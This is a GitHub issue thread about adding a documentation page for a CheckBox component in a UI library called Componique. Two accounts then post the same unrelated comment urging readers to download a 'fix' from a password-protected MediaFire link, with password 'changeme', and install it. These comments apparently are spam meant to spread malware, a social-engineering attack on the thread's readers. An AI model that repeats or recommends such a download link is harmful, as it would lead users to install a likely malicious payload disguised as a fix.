### ISSUE TITLE
[FEAT] CheckBox Docs Page

### ISSUE THREAD

**Issue by allone9425** [Poten14/Componique#162]
## 💥이슈 설명
- 체크박스 컴포넌트에 대한 docs를 구현 예정입니다.
## 📚할 일 목록
- [x] docs 작성

## ⌛기한
08.27

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
